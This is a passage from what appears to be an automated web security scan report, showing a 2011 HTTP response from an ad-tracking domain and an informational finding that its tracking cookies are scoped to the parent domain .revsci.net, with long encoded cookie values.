m8+w/tPxUSudzw+Ccz5NmqdRYDhwXP2vivNph//AC6o+bUCKoLppb7KZDdWerrU0xiCzURTdahihyMdpIpxd5vPFIWeL/i8ctdMFWbW8Z+8+zhGriDvxQ7jiONsPWKGbvBKZpdG97lKaae1pt0d9sGGhliMUB4E3pUIEuDw/uvvmm9Ew7yjLTQr1PjSFuc66cIcw+JKTU0eiETiPYVwLTQnOI8ECHXbjpeKJ8Od8p+7lr1wVlYKkgN2nnc9VAsIQNAzowv9f1KXIp0nYpCu3PMlzcdeaV3PfCc0odZjJH8DahgZfs4vq+ULbdJElVTtXEDdpONf7/EQ1DhA/U088DA8Ox2mfnwNqJgS0kW9a9nSChFrvZwx0hELLDZBPpwTlxxFylX2JXS9qjL1Af2/FntdKuNxgPYaO3jAsx4RbCTtl4ncHD4ANOy+fpl51/tMpJx2A1lgJ6/YQHYfds/I0IxdVi+5NUyqsGveCmOSXr7xJVm4J3+vGnZjTraBKRXEYSzrXg0uhx8JdQjuWYLLSvrZ09IWz+Kw7/QlQG7or4ZjOO2SeIRy2hb6l4kIiesZsbZ9juuksjVV9yKf7ajqjOty6DjvYvRs5BGIz6oHR0K8CDyE34Y0+jR6d8XaQfGAS6fRUCqwo10tRvXUGPGiYMfXcZwTDZYgmnC3v4MiNBsfnS3TA44mt9mz1N0gapo5/91lP8U6fac08NdxaJWnq1ZN0IjK6pvvx2CJ5k4EKU3/Zmh2hD4D5f0u"; NETSEGS_J08778=82f4957c1a652091&J08778&0&4e4fb452&0&&4e2a2ac1&1f1a384c105a2f365a2b2d6af5f27c36; rtc_Iyi8=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; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e4fb470&5&10055,10027,10194,10204,10534&4e2a4063&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF4zOheXIMH/C100a+jhgB5JQz9IZjavZ7K1gosDUmufPZUy3e6nNskvBlDss6Igv8EefmRVFOpsZtQKbTHaL5s67eycivqsaWchTq2HgY9rCkonmwYOmjESzd8Hfu2mt4/8m5rBqFwjk7Aq5rzaF0xDEpbi6ck85EjT5XVQYBW0axE8uqS+hiEEYEcYeIaWuf+MdzQ6AsLOgLXVmWTOVKjAyoQP7WvZAlUvkPcK72G5+fq3nIKPG7yUaKHKvmB9yngNub4NYQdwYhcV2jTGDY7QFZJVH/imA27tTIIsOHKuxVZzXiT3L+gfLu3s3ITaqCNMVzrqXrPvtx1rLIx5fhTY4xCnY7CJT89WTgh/dGENX2CVLeL7uWcUAMeqd3uTVy7HqvAevrubQKGsJTvdLNp4ahsc6REwVg0yIXZmM04EDy4ClRLdoB8DyviBnyDOCntPCWndzOeTjV88FSKTxjKUPccJj/kZazgV/1pTgo5xatqb6VW3+XO4Wl6ZpCTe8mN5JAFBHJT3GQvgZi1LEf83Ps9bVbzTBXzrsocf/r2M135+GwFFjL0ju+u1tQ4g7EVUBqH7gUook6lJwelB0Gygo5m9Mzi0DE/u7HGkdcre82fZ4/zZky07wd5qMAY6svFvHIeoBJfRhv9LgD6KzqgYh3arMBwLj39P74COZZJgZyoHr36NKTPHuLP4QXKdnx1CLBAU322StSAEhoMjUQMOSo3H2eNrwy5ZAgxoYL5O8FNjpVlwlysJkbP4UiWCXBgRr0sYOouSwQfe2jotjQ0EZlY1USWcXbaJV2CVRm+5T4; udm_0=MLv3NzMJZjpn3tsfiO/R13FKZpl5RwkMX74DDFYqbcU2P3iu7hhDZe+Kg6mfGbnMrZ7YR71fago4xEfgA35RQ2kOwGjoRcHmNunJSNEB7qBqp3FF0ZwJUOzxn/Zq/JqmDcVkmYy8owTOFswe7/mdqZ/1MkiSzYCBZq7UmIwDzLu7pNyD5SFIQeO3t5ZZHkUTEGJTyM6x9z33HIP4Zg8gx7jE+Tk9sf0WNg3pD8fXr+loZjNakB3gKJHeD5mWgUVW3NuSrVmwpALTd6i2pP5ILVMPbcHoSGHlfP1Fda5oO2Zy6i9DShlwoSSnQPRkqIgWX5YFQgczVLbBK85H2KqkX68KL4+NBZ7yz3xqunKsnufJtgbU6G9Xpd2+cdJ8VRLoTQgCpYJpu4VIaDQ70sPalbserRhsji0j9lBSvVWZygGs+KRvdf+44AiYo0EvENPZsLm5Se57lByboorwqOTcZuHwbiDjvG8IYttViHvi3b7M+6eHO8BgvFb+A/6Njc7zHImer5L7jixc2pP9dLUYC5x20lI7YgdcoxcI3BFJrP1chTCVmi7pGMx1Hv+7HasxxQk3POYvEr5HNwf4wsrYmlhnKPo7hBnaKlArotgLC2lEVlHFYfQZ10ruvHTr4q3N7SiQtfSINGU7Zt5F1RsdghMsOzmznG2Tt9mAUMSbkP246+k0wSjYCOIBpO8fDwL5ovEwvQ32/tCbr/J8Af+sIOV2WOrZKCxxxaQafbj4rvtV2LD8EmpcAQSgnfAfiByxojy6FADX+nUyJpKzvf0NNXKfIf1dG8zOVl1akJ2WBJz1Kt38Scluu6dkPtD/YMxSTbU538IcuZKyRs4Wq7vt7QXNe8ucDboZOyCc7gXhYHod8E+Ixn07z6wdskxO9K4PzdFetRqfX0edxs6pn3Ywbc9/jzTZ9nkAUC+cJaYVRu95++9DigkqOhW/1UtVS9efD3Ei1bOGUVggTgXbYm2u1pxs7u54s+7mDbKLGWLyD7UrRWSgT7aJVuFF8chckaSpqAdKfJnLslVszM6rr+5ZJDchlAhaq6pmxu3B8GYFqU1DKyIBT8Y7fkm5jo7YDIJVdcmu0/GhQFRarYfIc8P5Z6FJwBE2Sr9w0h/dNSZ1aL9bxPebSyBC4Mjr34Blq/Zz+Xgw5smJZOtKX7Pm2TdkWcX3vLjPWXl3TbHeFn+P9Pl5X4jBJDxcloHkVGOjBNUQPKbRKKJpS2lsZgK0BaVavltZ+O6tGs7E86RLivzbS/bDQ+5cHUBrGbQVgkS1j1oMqprrTRTvKaZq0RAbscu3ViNIG/EwJuYXAKnVh2CDAmvbfKGa5K14G49j6bMurvME1pY9HuSowoQKHzJBKidTUex9z3gBrVht371qB+q/FYGPPOvROMMWSTsR0mC8CbQ5PdJrzyUempZ5I4HZCX95JPzQuaKFxpOU+ANOofvBAn1Dn4dsb5Yf/xmnf+Ixy2+0NwwkgLhxrlAdZ8T12IfUeLoMOfes+WA7ArqPAMMINRme/CekwGjJAsTD29Ipj7dt7ovuzP13n6PoC1DDOjnHJonk40rXZhMzPgu1r4shM/t8yZAOLXXhNRQcyBo2OPoU6M4yrbas3zf6MrfA2WsjB/G+NBS1nFuhEVY3a9OpAMuN2YGByB0/FVZjLr7QnZr0Z3YfZQt8JaDEd7xk/aJy+8pf2iyaUpKM+QIJObFRJ64MbTgN40QttXVT9ll1aajC5up7ItYG3/rlKMZBEfl8ucoBYYRtH67iCGm+xqiQevjAFwWpMlLBxk5Wd29E/UceRUbypvHo8V7rFvqi1j5tpZHsZZ44gIKHPZl4S5JTLiibzNBC4HPjvDVeejmCm3V4P4y9JLhv00g0mXH2AbPG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Iyi8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Ua1q=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DQzp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WZeV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4k9BenIMH/AtZKgq+hOCsvh2r2fpRbBYl2Is25RiGwqMDYAWq41oDVUZb5s2bNY/AmmMRNQ6G8l48fXlg9Xrw+FNDSHO9q1L1+BkttWCI9q3WOlMccnlFzHz5krI3kNoRr4zsR9PHELUWr6j2eeyIDePG5HF46KZvWSpE5vgBPDmqePnRBl5pX/5dVDNNnzZfdsUyegbfitG3bFhewaGHZHOVdqC8MveccUVUNc3tl8hXJCQ8dDYb+HMR42JSJOb+0fZI2nxYX+RPo+dZlyS1ZGjC1EFv3OU+T+pxCwU9zwK9Rwh/FVOZWH7hpZb7kAHKB79H5NzAKIgaqBHcCgwrnOqoKNEXhDFclPG5DcpD6Gd3pyndKPUdXpAPGv1dQDdr9C0Mhsfp6ZDPhEmIwyBGOzXsOU/tJKupuDcNfy+6SKBr/5yLwEHRBJ1Nhid+tnhxr1cGbfqFqdZhpPMqzlbIfigtTfG3rzMmHmZvJEhToiUuh6rECbVxTG1RvxvJ97CdAMK1XXHCEj3jnHVxZMeKMBBdoo+h8pKRJaEdoJYwLvB9XpAmwHKNx3xTWjNv2rvodhDx4Ic8+WGN9THFS1ZPclQI8smbO6QztWAuRBHUuiZa8X11N/rAwS02XuE2QoDnXSjj2sAFV0S6laoiwidnAT4a90ULID3cJbRSdoyH2kOkPL3mWWoqp+EkgmSjP+NyzyM+GY5TYwrX7IAgUvoFfFmpgN8q+qEq+ha57oqyyAM2NiqimY66v+hqAM2+/vhpPdLYq8JcoZi7VbgOe7sDUbpbp0PUOxMpm9PrAPx2KgZVuce8tuMvMuvwxpeH5aJiDhx5mXIV456Prc=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:43:27 GMT; Path=/
Set-Cookie: NETSEGS_J08781=82f4957c1a652091&J08781&0&4e4fb9ff&1&10277&4e2a33c4&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Sat, 20-Aug-2011 13:43:27 GMT; Path=/
Set-Cookie: rtc_Bnax=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; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:43:27 GMT; Path=/
X-Proc-ms: 21
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:43:27 GMT
Content-Length: 1000

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs=['J08778_10040','J08778_10039','D08734_70076','D08734_70056','D08734_70065','J08778_10078','D08734_72011','D08734_72012','J08778_50019',
...[SNIP]...

10.136. http://pix04.revsci.net/J08778/b3/0/3/1008211/674742100.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J08778/b3/0/3/1008211/674742100.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jOheXIMH/C100a+jhgB5JQz9IZjanZPl2IsG/pV+3rIIntSQUTo+UUZb5s27MW9jF1lux5Epha/fOLzjgnJUWffsMV36gi002R4C2GgV/NGMrnYqSklFjL3l0pIXGuyk4XPPxY08/+jqMWN48TRFTRcueLV467hvWTpMyhBzj0rOIR2oCGdh8clqm9Av5iPgQoKjXW8woAIDT65M74f1iSxPUUxkZ3hMMthX3w6BBFQ5rLyWXT98dOkOgh9TrOrW1Dh40eMrTNj0NUbw9FJhFRf7xWT9RhaYvvdsjYLg8R3fCP3NOEWdRBwv535UGK/UmS+FP1si+gHzj2CkqSCrRwp6YTjW07xSc4n2q4T3xufprHEBav+jShJQ8ZVcLKMFKbczRfzywzx5uybvUAmtS6vGrozUIPNthtP8S11pDb7oriwJZdi6MWeQ2bLflNpFOLjeOYr2kiFTwtv1OcKwLTo7Am+kcvTdUWDd2z2+fNtcF1fK+9PogOEy2nAWTCRH2+b6sNrva5rrOc8FyS8AjCljCRhv6VzF6npg4l6X/6UAlXoMwm7wntokLVnZ6TGiBjifl9duqZiaDHdadWNOQxjXUcm8U4zxCJApWUI5t/Z7HTA5ewGHxhwJELUvwIMVaa3EuS02h8bF1SluB+KtLRL//VtC66JJOvgvoWUYNDLdD4zbUnu5GUeI6C5nriJvWWlYEUoU558L7Mx+XQVgocNlRLwZ8eKM8uCBcYAFRz8zYy8q+StO2UPSbSYfTe1Y+quDNaYv9Z8ZKObpmSzSWipXzin6iBH8cO5OeOmZviMdhBznj3JifD+NeM1CI3kAuipJmROM/oSIAljbFnhisG2zcS37dZIlEgNQoXr; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:19:14 GMT; Path=/
NETSEGS_H07710=82f4957c1a652091&H07710&0&4e4fb452&5&10055,10027,10194,10204,10534&4e2a4063&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Sat, 20-Aug-2011 13:19:14 GMT; Path=/
rtc_-bBu=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